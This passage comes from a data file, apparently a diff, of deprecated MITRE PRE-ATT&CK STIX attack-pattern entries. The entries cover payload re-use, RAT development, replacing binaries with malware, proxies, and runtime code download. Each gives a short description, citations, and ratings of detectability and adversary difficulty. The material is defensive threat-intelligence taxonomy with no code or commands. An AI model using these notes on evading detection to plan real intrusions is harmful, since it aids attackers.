[PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1281).\n\nTemplates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1281", + "external_id": "T1281" + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary may download templates or branding from publicly available presentations that the defender can't monitor.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Some branding information is publicly available when a corporation publishes their briefings to the internet which provides insight into branding information and template materials. An exhaustive list of templating and branding is likely not available on the internet.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1058", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "organizational-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--27f3ddf8-1b77-4cc2-a4c0-e6da3d31a768", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain/re-use payloads", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1346).\n\nA payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1346", + "external_id": "T1346" + }, + { + "source_name": "SonyDestover", + "description": "Kurt Baumgartner. (2014, December 4). 
Sony/Destover: mystery North Korean actor\u2019s destructive and past network activity. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but detecting an adversary acquiring a payload would require the defender to be monitoring the code repository where the payload is stored. If the adversary re-uses payloads, this allows the defender to create signatures to detect using these known indicators of compromise (e.g., hashes).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1123", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--13ff5307-b650-405a-9664-d8076930b2bf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Port redirector", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1363).\n\nRedirecting a communication request from one address and port number combination to another. May be set up to obfuscate the final location of communications that will occur in later stages of an attack. 
(Citation: SecureWorks HTRAN Analysis)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1363", + "external_id": "T1363" + }, + { + "source_name": "SecureWorks HTRAN Analysis", + "description": "JOE STEWART. (2011, August 3). HTran and the Advanced Persistent Threat. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS providers).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1140", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "stage-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--df42286d-dfbd-4455-bc9d-aef52ac29aa7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Post compromise tool development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1353).\n\nAfter compromise, an adversary may utilize additional tools to facilitate their end goals. 
This may include tools to further explore the system, move laterally within a network, exfiltrate data, or destroy data. (Citation: SofacyHits)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1353", + "external_id": "T1353" + }, + { + "source_name": "SofacyHits", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved March 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Post compromise tool development is a standard part of the adversary's protocol in developing the necessary tools required to completely conduct an attack.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1130", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--3160347f-11ac-44a3-9640-a648b3c17a8f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Private whois services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1305).\n\nEvery domain registrar maintains a publicly viewable database that displays contact information for every registered domain. Private 'whois' services display alternative information, such as their own company data, rather than the owner of the domain. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1305", + "external_id": "T1305" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Algorithmically possible to detect COTS service usage or use of non-specific mailing addresses (PO Boxes, drop sites, etc.)", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commercially available or easy to set up and/or register using a disposable email account.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1082", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--2141aea0-cf38-49aa-9e51-ac34092bc30a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Procure required equipment and software", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. 
The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1335).\n\nAn adversary will require some physical hardware and software. They may only need a lightweight set-up if most of their activities will take place using on-line infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems. (Citation: NYTStuxnet)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1335", + "external_id": "T1335" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1112", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Ease and availability of current hardware and software, mobile phones (cash and go phones), and additional online technology simplifies adversary process to achieve this technique (and possibly without traceability). 
The adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [https://aws.amazon.com AWS], VPS).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Outside of highly specific or rare HW, nearly impossible to detect and track.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b14f6692-b613-44bb-9f30-8381a5ff10d5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Proxy/protocol relays", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1304).\n\nProxies act as an intermediary for clients seeking resources from other systems. Using a proxy may make it more difficult to track back the origin of a network communication. (Citation: APT1)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1304", + "external_id": "T1304" + }, + { + "source_name": "APT1", + "description": "Mandiant. (n.d.). APT1: Exposing One of China\u2019s Cyber Espionage Units. Retrieved March 5, 2017." 
+ } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defenders with standard capabilities will traditionally be able to see the first hop but not all the subsequent earlier hops an adversary takes to be able to conduct reconnaissance.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Proxies are readily available for the adversary with both free and cost-based options available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1081", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--702dc95d-3266-42dc-9eef-4a19e2445148", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Push-notification client-side exploit", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nA technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1373", + "url": "https://attack.mitre.org/techniques/T1373" + }, + { + "description": "Joshua Drake. (2015, August 5). Stagefright: Scary Code in the Heart of Android. Retrieved March 29, 2017.", + "source_name": "BlackHat Stagefright" + }, + { + "description": "Wikipedia contributors. (2017, March 8). Stagefright (bug). 
Retrieved March 9, 2017.", + "source_name": "WikiStagefright" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:22:23.446Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1150", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Easily executed technique to push an MMS-type message to the target which does not require interaction on the part of the target to be successful.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "For non-corporate cellular devices not joined to the corporate network, it is not possible to detect an adversary's use of the technique because messages traverse networks outside of the control of the employer. For corporate cellular devices which are joined to the corporate network, monitoring of messages and ability to patch against push attacks is possible, assuming they are fully monitored.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--acfcbe7a-4dbc-4471-be2b-134faf479e3e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Receive KITs/KIQs and determine requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1239).\n\nApplicable agencies and/or personnel receive intelligence requirements and evaluate them to determine sub-requirements related to topics, questions, or requirements. 
For example, an adversary's nuclear energy requirements may be further divided into nuclear facilities versus nuclear warhead capabilities. (Citation: AnalystsAndPolicymaking)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1239", + "external_id": "T1239" + }, + { + "source_name": "AnalystsAndPolicymaking", + "description": "Jack Davis. (2002, September). Improving CIA Analytic Performance: Analysts and the Policymaking Process. Retrieved March 5, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1016", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--7863b7f1-c18a-4aad-a6cf-4aa6d8797531", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Receive operator KITs/KIQs tasking", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1235).\n\nAnalysts may receive intelligence requirements from leadership and begin research process to satisfy a requirement. 
Part of this process may include delineating between needs and wants and thinking through all the possible aspects associating with satisfying a requirement. (Citation: FBIIntelligencePrimer)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1235", + "external_id": "T1235" + }, + { + "source_name": "FBIIntelligencePrimer", + "description": "FBI. (n.d.). Intelligence Branch: Intelligence Primer. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1012", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-planning" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--9755ecdc-deb0-40e6-af49-713cb0f8ed92", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Remote access tool development", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1351).\n\nA remote access tool (RAT) is a piece of software that allows a remote user to control a system as if they had physical access to that system. 
An adversary may utilize existing RATs, modify existing RATs, or create their own RAT. (Citation: ActiveMalwareEnergy)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1351", + "external_id": "T1351" + }, + { + "source_name": "ActiveMalwareEnergy", + "description": "Dan Goodin. (2014, June 30). Active malware operation let attackers sabotage US energy industry. Retrieved March 9, 2017.", + "url": "https://arstechnica.com/information-technology/2014/06/active-malware-operation-let-attackers-sabotage-us-energy-industry/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1128", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Many successful RATs exist for re-use/tailoring in addition to those an adversary may choose to build from scratch. The adversary's capabilities, target sensitivity, and needs will likely determine whether a previous RAT is modified for use a new one is built from scratch.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--0d759854-9b69-438c-8325-74b03cc80cf0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Replace legitimate binary with malware", + "description": "**This technique has been deprecated. 
Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nReplacing a legitimate binary with malware can be accomplished either by replacing a binary on a legitimate download site or standing up a fake or alternative site with the malicious binary. The intent is to have a user download and run the malicious binary thereby executing malware. (Citation: FSecureICS)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1378", + "url": "https://attack.mitre.org/techniques/T1378" + }, + { + "description": "Daavid and Antti. (2014, June 23). Havex Hunts For ICS/SCADA Systems. Retrieved March 9, 2017.", + "source_name": "FSecureICS" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:23:46.977Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1155", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Requires the adversary to replace a binary on a website where users will download the binary (e.g., patch, firmware update, software application) as innately trusted. The additional challenge is the reduced set of vendor-trusted websites that are vulnerable.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_detectable_by_common_defenses_explanation": "On the host end user system, integrity checking (e.g., hash verification, code signing enforcement), application whitelisting, sandboxing, or behavioral-based/heuristic-based systems are most likely to be successful in detecting this technique. 
On the source webserver, detecting binary changes is easy to detect if performed.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "No" + }, + { + "id": "attack-pattern--abd5bed1-4c12-45de-a623-ab8dc4ff862a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Research relevant vulnerabilities/CVEs", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1291).\n\nCommon Vulnerability Enumeration (CVE) is a dictionary of publicly known information about security vulnerabilities and exposures. An adversary can use this information to target specific software that may be vulnerable. (Citation: WeaponsVulnerable) (Citation: KasperskyCarbanak)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1291", + "external_id": "T1291" + }, + { + "source_name": "WeaponsVulnerable", + "description": "Jack Smith IV. (2015, January 22). Pentagon Chief Weapons Tester: Almost All Military Programs Vulnerable to Cyber-Attacks. Retrieved March 5, 2017." + }, + { + "source_name": "KasperskyCarbanak", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2015, February). CARBANAK APT THE GREAT BANK ROBBERY. 
Retrieved March 27, 2017.", + "url": "https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1068", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Using standard headers/fingerprints from normal traffic, it is often trivial to identify the SW or HW the target is running, which can be correlated against known CVEs and exploit packages.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--b26babc7-9127-4bd5-9750-5e49748c9be3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Research visibility gap of security vendors", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1290).\n\nIf an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1290", + "external_id": "T1290" + }, + { + "source_name": "CrowdStrike Putter Panda", + "description": "Crowdstrike Global Intelligence Team. (2014, June 9). CrowdStrike Intelligence Report: Putter Panda. 
Retrieved January 22, 2016.", + "url": "http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Public source external to the defender's organization.", + "x_mitre_difficulty_for_adversary": "No", + "x_mitre_difficulty_for_adversary_explanation": "Requires in-depth research and potentially other intrusions, requires unbounded amount of work to possibly find a return on investment", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1067", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-weakness-identification" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--a16e4004-caac-4a0b-acd5-486f8fda1665", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Review logs and residual traces", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1358).\n\nExecution of code and network communications often result in logging or other system or network forensic artifacts. An adversary can run their code to identify what is recorded under different conditions. This may result in changes to their code or adding additional actions (such as deleting a record from a log) to the code. 
(Citation: EDB-39007) (Citation: infosec-covering-tracks)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1358", + "external_id": "T1358" + }, + { + "source_name": "EDB-39007", + "description": "Tavis Ormandy and Natalie Silvanovich. (2015, December 16). FireEye - Wormable Remote Code Execution in MIP JAR Analysis. Retrieved March 9, 2017." + }, + { + "source_name": "infosec-covering-tracks", + "description": "Infosec Institute. (2015, September 9). Covering Tracks of Attacks. Retrieved May 9, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary controls the test and defender likely has no visibility.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Adversary has full control of environment to determine what level of auditing and traces exist on a system after execution.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1135", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "test-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--41086474-e6de-4fac-bb69-640db7fdf3d2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Runtime code download and execution", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nMany mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted applications for malicious behavior. 
However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1395", + "url": "https://attack.mitre.org/techniques/T1395" + }, + { + "description": "Claud Xiao. (2016). Fruit vs Zombies: Defeat Non-jailbroken iOS Malware. Retrieved April 12, 2017.", + "source_name": "Fruit vs Zombies" + }, + { + "description": "Jon Oberheide. (2010). Android Hax. Retrieved April 12, 2017.", + "source_name": "Android Hax" + }, + { + "description": "Sebastian Poeplau, Yanick Fratantonio, Antonio Bianchi, Christopher Kruegel, Giovanni Vigna. (2014). Execute This! Analyzing Unsafe and Malicious Dynamic Code Loading in Android Applications. Retrieved April 12, 2017.", + "source_name": "Execute This!" + }, + { + "description": "Wish Wu. (2016, July 15). Fake News App in Hacking Team Dump Designed to Bypass Google Play. Retrieved April 12, 2017.", + "source_name": "HT Fake News App" + }, + { + "description": "Radhesh Krishnan Konoth, Victor van der Veen and Herbert Bos. (2016). How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication. Retrieved April 12, 2017.", + "source_name": "Anywhere Computing kill 2FA" + }, + { + "description": "Google. (2016, April). Android Security 2015 Year In Review. 
Retrieved April 12, 2017.", + "source_name": "Android Security Review 2015" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:24:50.384Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1172", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Runtime code execution techniques and examples of their use are widely documented on both Apple iOS and Android.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Third-party mobile application security analysis services exist that scan for use of these techniques in iOS and Android applications. Additionally, Google specifically calls out the ability to \"identify attacks that require connection to a server and dynamic downloading of code\" in its Android Security 2015 Year in Review report. However, many applications use these techniques as part of their legitimate operation, increasing the difficulty of detecting or preventing malicious use.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + }, + { + "id": "attack-pattern--e34b9ca1-8778-41a3-bba5-8edaab4076dc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "SSL certificate acquisition for domain", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1337).\n\nCertificates are designed to instill trust. 
